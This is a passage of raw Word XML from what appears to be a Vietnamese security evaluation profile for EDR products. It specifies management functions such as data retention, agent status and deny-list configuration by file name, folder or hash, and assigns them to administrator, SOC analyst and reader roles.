        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Quản lý </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidR="00C42841" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FMT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445C3A1B" w14:textId="22AA7285" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3.3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00C42841" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FMT_SMF.1</w:t>
      </w:r>
      <w:r w:rsidR="00C42841" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/ENDPOINT </w:t>
      </w:r>
      <w:r w:rsidR="00C42841" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Đặc điểm kỹ thuật của chức năng quản lý (Quản lý EDR của EDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212E080F" w14:textId="127505A8" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FMT_SMF.1.1</w:t>
      </w:r>
      <w:r w:rsidR="00C42841" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/ENDPOINT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7F0A7" w14:textId="09E27276" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tinh chỉnh:</w:t>
      </w:r>
      <w:r w:rsidR="009D4B2B" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ có khả năng thực hiện các chức năng quản lý sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5436"/>
        <w:gridCol w:w="1408"/>
        <w:gridCol w:w="1832"/>
        <w:gridCol w:w="1411"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="7E857947" w14:textId="77777777" w:rsidTr="003E31C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BD82244" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Chức năng quản lý</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DA75E40" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Quản trị</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38D78508" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Chuyên gia phân tích SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F175E32" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Người đọc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="1F4A3108" w14:textId="77777777" w:rsidTr="003E31C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="618AA62E" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>Cấu hình lượng thời gian để lưu giữ dữ liệu được EDR thu thập [</w:t>
            </w:r>
            <w:r w:rsidRPr="00715386">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>chỉ định</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00715386">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:i/>
              </w:rPr>
              <w:t>khung thời gian để lưu giữ dữ liệu</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>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1629A0" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>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479CB8" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>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53FE28" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="4EDDBE70" w14:textId="77777777" w:rsidTr="003E31C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C47B3FA" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1005"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>Nhận hoặc hiển thị trạng thái kết nối của Tác nhân máy chủ</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D0873D" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>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E10E19" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>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E68DE0" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="3556D941" w14:textId="77777777" w:rsidTr="003E31C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BDFB664" w14:textId="3EA1029A" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="005A544E" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Cấu hình xác định danh sách từ chối</w:t>
            </w:r>
            <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> gồm [</w:t>
            </w:r>
            <w:r w:rsidR="00494E4D" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>lựa chọn</w:t>
            </w:r>
            <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="00D63D1D" w:rsidRPr="002D622B">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>tên tệp, thư mục, hàm băm tệp, [</w:t>
            </w:r>
            <w:r w:rsidRPr="002D622B">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D63D1D" w:rsidRPr="002D622B">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>chỉ định</w:t>
            </w:r>
            <w:r w:rsidR="00D63D1D" w:rsidRPr="002D622B">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:i/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:i/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>các yếu tố khác</w:t>
            </w:r>
            <w:r w:rsidRPr="00715386">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D63D1D" w:rsidRPr="00715386">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:i/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r w:rsidR="00494E4D" w:rsidRPr="00715386">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>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64DCCA" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>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770FA4" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>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9FF3C1" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="4AADCD73" w14:textId="77777777" w:rsidTr="003E31C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FD9578C" w14:textId="3432FE69" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>Định cấu hình ngăn chặn trực quan các cảnh báo sự cố dựa trên danh sách từ chối có thể định cấu hình gồm [</w:t>
            </w:r>
            <w:r w:rsidR="005A544E" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
              </w:rPr>
              <w:t>lựa chọn</w:t>
            </w:r>
            <w:r w:rsidRPr="002D622B">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:i/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="002D622B">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>tên tệp, thư mục, hàm băm tệp, [</w:t>
            </w:r>
            <w:r w:rsidRPr="002D622B">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>chỉ định</w:t>
            </w:r>
            <w:r w:rsidRPr="002D622B">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="002D622B">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:i/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> các yếu tố khác]</w:t>
            </w:r>
            <w:r w:rsidR="00494E4D" w:rsidRPr="002D622B">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>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0073E5" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>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6AF076" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>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97914B" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08AFA181" w14:textId="3108F979" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chú giải bảng: M = Bắt buộc, O = Tùy chọn, - = </w:t>
      </w:r>
      <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Không xác định</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D3747B" w14:textId="449166D8" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lưu ý áp dụng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yêu cầu này </w:t>
      </w:r>
      <w:r w:rsidR="005A544E" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bao gồm</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tất cả các chức năng cấu hình TSF cung cấp cho quản trị viên để cấu hình EDR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F286960" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hoạt động đánh giá:</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789"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="26ACE1B4" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C5F67C8" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="531D50AD" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Hoạt động đảm bảo </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="3728FAD8" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="515B7C99" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
